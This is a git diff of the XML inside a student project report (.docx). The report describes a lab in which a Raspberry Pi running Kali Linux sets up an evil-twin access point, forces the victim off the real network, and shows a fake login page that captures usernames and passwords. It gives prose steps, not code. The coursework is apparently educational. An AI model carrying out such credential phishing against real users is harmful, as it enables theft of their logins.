--- a/Project1/Project_report.docx
+++ b/Project1/Project_report.docx
@@ -347,14 +347,16 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
@@ -372,15 +374,15 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve">In this task , firstly ,we install the kali </w:t>
@@ -390,7 +392,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t>linux</w:t>
@@ -400,7 +402,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve"> system in the raspberry </w:t>
@@ -409,7 +411,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t>P</w:t>
@@ -418,7 +420,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve">i, after that we </w:t>
@@ -427,7 +429,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t>turn</w:t>
@@ -436,7 +438,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve"> on the raspberry pi and open the terminal typing `</w:t>
@@ -446,7 +448,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t>ifconfig</w:t>
@@ -456,7 +458,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t>` command it shows there is no connection with internet in wlan1 which means no ipv4 address been allocated to this machine we are using, and then we initialize the connection to the WIFI , we input the command again, it show the allocated ipv4 address in wlan1</w:t>
@@ -475,24 +477,286 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Task1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In task 2, in the beginning, we create the fake AP which the name is same as the victim connected to, after that, we force </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the target to disconnect from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the original AP and connect to our fake AP, this is because the SSID of the original AP is same as the fake one, when the victim machine find </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">out </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>can not</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connect the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> real AP,  it will try to connect the fake one which because the SSID is same as the real one.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>2 ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the victim have </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>alreadly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connect to the fake AP, in this situation, as long as victim machine try to browsing the web, the fake login webpage will show in front of the victim and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>mis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>guide them to enter the username and password, this confidential information will capture in the backend of the raspberry Pi</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -501,287 +765,1829 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Task1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we downland the image of kali </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>balenaEtcher</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to install the OS into the raspberry Pi, after </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">we </w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>turn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we open the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>term</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>inal and i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">put </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>`</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>dowland</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ifconfig</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the image of kali </w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>` to check whether the internet card connect to the internet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before and after we connect to the internet.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The first step we done in this task is to create the fake AP, we have already plugin the ALFA </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>linux</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>adaptor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>,and</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and using </w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
